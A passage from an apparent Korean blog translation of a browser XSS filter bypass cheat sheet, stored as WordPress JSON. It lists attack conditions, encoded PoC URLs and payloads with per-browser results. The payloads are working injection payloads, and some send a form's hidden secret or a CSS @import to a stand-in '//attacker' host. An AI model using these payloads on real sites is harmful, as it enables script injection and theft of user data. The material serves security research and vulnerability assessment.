\uc870\uac74:<\/p>\n\n\n\n<ol><li>\ub9c1\ud06c\ub97c \ud1b5\ud55c Reflected XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>\uc774\uc911\uc73c\ub85c \ub9c1\ud06c\ub97c \uac78\uc5b4 \ud574\ub2f9 \ub3c4\uba54\uc778\uc5d0\uc11c\uc758 referer\ub97c \uc0dd\uc131\ud574\uc8fc\ub294 \ubc29\ubc95\uc73c\ub85c javascript:alert() \ucc98\ub7fc XSS\ud544\ud130 \uc6b0\ud68c\uac00 \uac00\ub2a5\u3002<\/p>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/link?q=?q=javascript%253Aalert(1)\">https:\/\/vulnerabledoma.in\/bypass\/link?q=?q=javascript%253Aalert(1)<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;a href=\"?q=javascript%3Aalert(1)\"&gt;Link&lt;\/a&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E8%84%86%E5%BC%B1%E3%81%AAform%E3%81%B8%E3%81%AE%E9%80%81%E4%BF%A1%E5%89%8D%E3%81%AE%E7%8A%B6%E6%85%8B%E3%82%92%E3%83%9A%E3%83%BC%E3%82%B8%E4%B8%8A%E3%81%AB%E7%B6%AD%E6%8C%81%E3%81%A7%E3%81%8D%E3%82%8B%E5%A0%B4%E5%90%88\"><\/a>\ucde8\uc57d\ud55c form\uc758 \uc804\uc1a1 \uc774\uc804\uc758 \uc0c1\ud0dc\ub97c \uc870\uc791 \uac00\ub2a5\ud55c \uacbd\uc6b0<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>Reflected XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><\/ol>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/form?q=%26%23x22%3B%3E%26%23x3C%3Bscript%3Ealert%26%23x28%3B1)%26%23x3C%3B\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/form?q=%26%23&#215;22%3B%3E%26%23x3C%3Bscript%3Ealert%26%23&#215;28%3B1)%26%23x3C%3B\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;form action=\"form\"&gt;\n&lt;input type=\"hidden\" name=\"q\" value=\"&amp;#x22;&gt;&amp;#x3C;script&gt;alert&amp;#x28;1)&amp;#x3C;\/script&gt;\"&gt;\n&lt;input type=\"hidden\" name=\"secret\" value=\"a09d3ef0\"&gt;\n&lt;input type=\"submit\"&gt;\n&lt;\/form&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#option%E3%82%BF%E3%82%B0%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>option\ud0dc\uadf8\uc758 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>form\ub0b4\uc5d0 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/html5sec.org\/xssfilter\/entities\">https:\/\/html5sec.org\/xssfilter\/entities<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/form3?q=%3Cbutton%20formaction=form3%3ECLICK%3Cselect%20name=q%3E%3Coption%3E%26lt%3Bscript%3Ealert(1)%26lt%3B\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/form3?q=%3Cbutton%20formaction=form3%3ECLICK%3Cselect%20name=q%3E%3Coption%3E%26lt%3Bscript%3Ealert(1)%26lt%3B\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;form action=submit&gt;\n&lt;button formaction=form3&gt;CLICK&lt;select name=q&gt;&lt;option&gt;&amp;lt;script&gt;alert(1)&amp;lt;\/script&gt;\n&lt;\/form&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E7%A9%BA%E3%81%AEiframe%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>\ube44\uc5b4\uc788\ub294 iframe\ud0dc\uadf8\uc758 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\ud398\uc774\uc9c0\uac00 \ud504\ub808\uc784 \ud0dc\uadf8\ub97c \ud5c8\uc6a9\ud568<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>XSS\ub85c \ube48 iframe\uc744 \ub9cc\ub4e4\uace0 \ub9cc\ub4e4\uc5b4\uc9c4 \ud504\ub808\uc784\uc758 src\ub97c \uc790\ubc14\uc2a4\ud06c\ub9bd\ud2b8 \ucf54\ub4dc\ub85c \ud558\uba74,<br>\ucde8\uc57d\uc810\uc774 \uc874\uc7ac\ud558\ub294 \ub3c4\uba54\uc778 \uc790\uc2e0\uc758 referer\uac00 \ubd99\uae30 \ub54c\ubb38\uc5d0 \uc6b0\ud68c\uac00 \uac00\ub2a5<\/p>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"http:\/\/www.cracking.com.ar\/bugs\/2016-07-14\/\">http:\/\/www.cracking.com.ar\/bugs\/2016-07-14\/<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/l0.cm\/bypass\/ieedge_iframe.html\">https:\/\/l0.cm\/bypass\/ieedge_iframe.html<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;!-- Found by @magicmac2000 --&gt;<br>&lt;iframe onload=\"contentWindow[0].location='\/\/vulnerabledoma.in\/bypass\/text?q=&lt;script&gt;alert(location)&lt;\/script&gt;'\"<br>src=\"\/\/vulnerabledoma.in\/bypass\/text?q=%3Ciframe%3E\"&gt;&lt;\/iframe&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#formaction%E3%81%AE%E5%88%A9%E7%94%A8%E6%83%85%E5%A0%B1%E3%81%AE%E5%8F%96%E5%BE%97%E3%81%AE%E3%81%BF\"><\/a>formaction\uc758 \uc0ac\uc6a9 (\ubbfc\uac10 \uc815\ubcf4 \ucde8\ub4dd \uac00\ub2a5)<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>Reflected XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\ubbfc\uac10 \uc815\ubcf4\uac00 \ud3ec\ud568\ub41c \uae30\uc874\uc758 form \ud0dc\uadf8\uc758 action\uac12\uc744 \ub300\uc2e0\ud560 <a href=\"https:\/\/www.w3schools.com\/tags\/att_button_formaction.asp\">formaction <\/a>\uc18d\uc131\uc744 \uc4f8 \uc218 \uc788\uc74c<\/li><\/ol>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/form?q=%22%3E%3Cbutton%20formaction=\/\/attacker\/%3E\">https:\/\/vulnerabledoma.in\/bypass\/form?q=%22%3E%3Cbutton%20formaction=\/\/attacker\/%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;form action=\"form\"&gt;\n&lt;input type=\"hidden\" name=\"q\" value=\"\"&gt;&lt;button formaction=\/\/attacker\/&gt;\"&gt;\n&lt;input type=\"hidden\" name=\"secret\" value=\"a09d3ef0\"&gt;\n&lt;input type=\"submit\"&gt;\n&lt;\/form&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#style%E3%81%A7%E3%81%AE%E6%96%87%E5%AD%97%E5%8F%82%E7%85%A7%E5%8C%96%E3%81%97%E3%81%9F%E6%96%87%E5%AD%97%E5%88%97%E3%81%AE%E5%88%A9%E7%94%A8style%E3%81%AE%E8%A8%98%E8%BF%B0%E3%81%AE%E3%81%BF\"><\/a>CSS\uc758 \ucc38\uc870 \uad6c\ubb38 \uc774\uc6a9(CSS \uac12 \uc870\uc791 \uac00\ub2a5\uc2dc)<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>Reflected XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>CSS\uc758 \uac12\uc744 \uc870\uc791\ud560 \uc218 \uc788\uc74c<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>CSS\ub098 SVG\uc5d0\uc11c \ud2b9\uc218\ubb38\uc790(<strong>@<\/strong>,<strong> :<\/strong>,<strong> \\<\/strong>,<strong> (<\/strong>)\ub97c \uc0ac\uc6a9\ud560 \uc218 \uc788\uc744 \ub54c import \uad6c\ubb38\uc744 \uc0ac\uc6a9\ud574 \uc545\uc758\uc801\uc778 Request\ub97c \ubc1c\uc0dd\uc2dc\ud0ac \uc218 \uc788\uc74c<br>IE\uc5d0\uc11c\ub294 behavior:url()\ud568\uc218\ub97c \uc0ac\uc6a9\ud574 \uc790\ubc14\uc2a4\ud06c\ub9bd\ud2b8\uc758 \uc2e4\ud589\ub3c4 \uac00\ub2a5\ud568<\/p>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/twitter.com\/0x6D6172696F\/status\/752190911879184384\"><\/a><a href=\"http:\/\/www.businessinfo.co.uk\/labs\/talk\/The_Sexy_Assassin.ppt\">http:\/\/www.businessinfo.co.uk\/labs\/talk\/The_Sexy_Assassin.ppt<\/a><\/li><li><a href=\"https:\/\/blog.innerht.ml\/cascading-style-scripting\/\">https:\/\/blog.innerht.ml\/cascading-style-scripting\/<\/a><\/li><li><a href=\"https:\/\/antoinevastel.com\/security\/privacy\/2017\/04\/09\/history-stealing.html\">https:\/\/antoinevastel.com\/security\/privacy\/2017\/04\/09\/history-stealing.html<\/a> <\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Csvg%3E%3Cstyle%3E%26commat%3Bimport'\/\/attacker'%3C\/style%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Csvg%3E%3Cstyle%3E%26commat%3Bimport&#8217;\/\/attacker&#8217;%3C\/style%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;svg&gt;&lt;style&gt;&amp;commat;import'\/\/attacker'&lt;\/style&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Csvg%3E%3Cstyle%3E@%26bsol%3B0069mport%27\/\/attacker%27%3C\/style%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Csvg%3E%3Cstyle%3E@%26bsol%3B0069mport%27\/\/attacker%27%3C\/style%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;svg&gt;&lt;style&gt;@&amp;bsol;0069mport'\/\/attacker'&lt;\/style&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cp%20style=%22behavior%26colon%3Burl(%27\/bypass\/usercontent\/xss.txt%27)%22%3Etest&amp;xuac=10\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cp%20style=&#8221;behavior%26colon%3Burl(&#8216;\/bypass\/usercontent\/xss.txt&#8217;)&#8221;%3Etest&amp;xuac=10<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;p style=\"behavior&amp;colon;url('\/bypass\/usercontent\/xss.txt')\"&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cp%20style=%22behavior:url%26lpar%3B%27\/bypass\/usercontent\/xss.txt%27)%22%3Etest&amp;xuac=10\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cp%20style=&#8221;behavior:url%26lpar%3B&#8217;\/bypass\/usercontent\/xss.txt&#8217;)&#8221;%3Etest&amp;xuac=10<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;p style=\"behavior:url&amp;lpar;'\/bypass\/usercontent\/xss.txt')\"&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<blockquote class=\"wp-block-quote\"><p><strong>\ub9c8\uce58\uba70&#8230;<\/strong><br>\ubc88\uc5ed\uc744 \uc131\uc2ec\uaecf \ub3c4\uc640\uc900 <a href=\"https:\/\/github.com\/Hikai\">hiki<\/a>\uc5d0\uac8c \uac10\uc0ac\ub97c \ud45c\ud55c\ub2e4. <br>\uc774 \ubb38\uc11c\uac00 \ub300\ud55c\ubbfc\uad6d\uc758 \uc6f9\ud574\ucee4\ub4e4\uc774 \uc0c8\ub85c\uc6b4 \uacbd\uc9c0\ub97c \uac1c\ucc99\ud560 \uc218 \uc788\ub294 \ub2e8\uc11c\uac00 \ub418\uae38 \ubc14\ub780\ub2e4.<\/p><p>\uc6d0\uae00 : <\/p><p><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet\">https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser&#8217;s-XSS-Filter-Bypass-Cheat-Sheet<\/a> <\/p><\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>\uc774 \uae00\uc740 XSS Auditor, XSS \ud544\ud130\uc758 \uc6b0\ud68c\uc5d0 \ub300\ud574 \ub2e4\ub8e8\uace0 \uc788\ub2e4.\ub300\uc0c1\uc740 Chrome, Firefox, Edge, IE11, Safari, Opera \uc774\ub2e4.\ub9cc\uc57d \ub2f9\uc2e0\uc774 \ucde8\uc57d\uc810 \uc9c4\ub2e8 \uc5c5\ubb34\ub97c \ud558\uace0\uc788\ub2e4\uba74 XSS \ud544\ud130\uc758 \uc6b0\ud68c\uac00 \uac00\ub2a5\ud558\ub2e4\ub294 \uc0ac\uc2e4\uc744 \ub110\ub9ac \uc54c\ub9ac\uae30 \uc704\ud574\uc11c \ub354 \ub9ce\uc740 \uc6b0\ud68c \ubc29\ubc95\uc744 \ucc3e\uc544\uc11c \uc54c\ub824\uc8fc\uc2ed\uc2dc\uc624.\ub610\ud55c \uc774 \uae00\uc740 \uc77c\ubc18\uc801\uc778 \uc0c1\ud669\uc5d0\uc11c \uc6b0\ud68c \uac00\ub2a5\ud55c \ucf00\uc774\uc2a4\uc5d0 \ub300\ud574\uc11c\ub9cc \ub2e4\ub8e8\uace0 \uc788\ub2e4.\uc5ec\uae30\uc5d0\uc11c \ub2e4\ub8e8\uc9c0 \uc54a\ub354\ub77c\ub3c4 \uc2e4\uc81c \uc0c1\ud669\uc5d0\uc11c\ub294 \ub354 \ub2e4\uc591\ud55c \ubc29\ubc95\uc774 \uc788\uc744 \uc218 \uc788\ub2e4.\ub2f9\uc2e0\uc774 \ubcf4\uc548 \ub2f4\ub2f9\uc790\ub77c\uba74 XSS \ud544\ud130\uc758 \uc874\uc7ac\uc640 \uad00\uacc4\uc5c6\uc774 \uadfc\ubcf8\uc801\uc778 XSS \ub300\ucc45\uc744 \uc218\ub9bd\ud558\ub294\uac83\uc744 \uad8c\uc7a5\ud55c\ub2e4. MS Edge\ub294 Windows 10 Build 17723 \ubd80\ud130 XSS \ud544\ud130\uac00 \uc0ad\uc81c\ub418\uc5c8\ub2e4.\uc774 \uae00\uc5d0\uc11c Edge \ube0c\ub77c\uc6b0\uc800\ub294 XSS \ud544\ud130\uac00 \uc544\uc9c1 \uc874\uc7ac\ud558\ub294 \ubc84\uc804\uc744 \uc0ac\uc6a9\ud574 \ud14c\uc2a4\ud2b8\ub418\uc5c8\ub2e4. \ubaa9\ucc28 XSS Auditor(Chromium) \ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83 \ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4\uc5d0\uc11c \uc77c\uc5b4\ub098\ub294 XSS URL \ub2e8\ub3c5\uc73c\ub85c \uc131\ub9bd\ud558\ub294 XSS(\uc785\ub825\uac12\uc774 a\ud0dc\uadf8\uc758 href\uc18d\uc131\uc5d0 \uc9c1\uc811 \ub4e4\uc5b4\uac00\ub294 \uacbd\uc6b0) 2\uac1c \uc774\uc0c1\uc758 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \uc788\ub294 \uacbd\uc6b0 \ubb38\uc790\uc5f4\uc774 \uc870\uc791\ub418\ub294 \uacbd\uc6b0 \uc0ad\uc81c\ub418\ub294 \uacbd\uc6b0 \uce58\ud658\ub418\ub294 \uacbd\uc6b0 Request\uac12\uc744 document.write() \ud558\ub294 \uacbd\uc6b0\ub97c \uc81c\uc678\ud55c DOM based XSS XML \ud398\uc774\uc9c0\uc5d0\uc11c\uc758 XSS http(s): \ub9c1\ud06c \ub9cc\ub4e4\uae30 \uc678\ubd80\ub85c Request\ub97c \ub9cc\ub4e4 \uc218 \uc788\ub294 \ud0dc\uadf8 \uc784\uc758\uc758 CSS \uc2e4\ud589 \ud544\ud130 \uc6b0\ud68c SVG \uc560\ub2c8\uba54\uc774\uc158 \ud6a8\uacfc\uc758 values \uc18d\uc131\uc744 \uc0ac\uc6a9 \uc5ec\ub7ec\uac1c\uc758 null\ubb38\uc790\ub97c \uc0ac\uc6a9 script\ud0dc\uadf8\uc758 -\u200b-> \uc8fc\uc11d\uc744 \uc0ac\uc6a9 \uc5b4\uc911\uac04\ud55c base \ud0dc\uadf8\uc758 \uc0ac\uc6a9 Flash \uc0ac\uc6a9 \uc0c1\ub300\uacbd\ub85c\ub85c js\ud30c\uc77c\uc744 \ub85c\ub4dc\ud558\ub294 \uc2a4\ud06c\ub9bd\ud2b8 \uc0ac\uc6a9 ISO-2022-JP \uc774\uc2a4\ucf00\uc774\ud504 \uc2dc\ud000\uc2a4 \uc0ac\uc6a9 \ub3d9\uc77c\ud55c \ub3c4\uba54\uc778\uc758 \ub9ac\uc18c\uc2a4 \uc0ac\uc6a9 Path\ub97c \uc0ac\uc6a9\ud55c XSS \ud30c\uc77c \uc5c5\ub85c\ub4dc \uae30\ub2a5 \uc0ac\uc6a9 Flash\uc640 flashvars\uc758 \uc0ac\uc6a9 Flash\uc640ExternalInterface.objectID\uc640 ExternalInterface.call()\uc758 \uc0ac\uc6a9 Angular\uc758 \uc0ac\uc6a9 Vue.js\uc758 \uc0ac\uc6a9 jQuery\uc758 \uc0ac\uc6a9 underscore.js\uc758 \uc0ac\uc6a9 JSXTransformer\/babel-standalone\ub4f1\uc758 JSX \ubcc0\ud658 \uc2a4\ud06c\ub9bd\ud2b8 \uc0ac\uc6a9 document.write()\ub420 \ub54c \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\ub97c \uc0ac\uc6a9 \uc5b4\uc911\uac04\ud55c form\ud0dc\uadf8\uc758 \uc0ac\uc6a9(\ubbfc\uac10 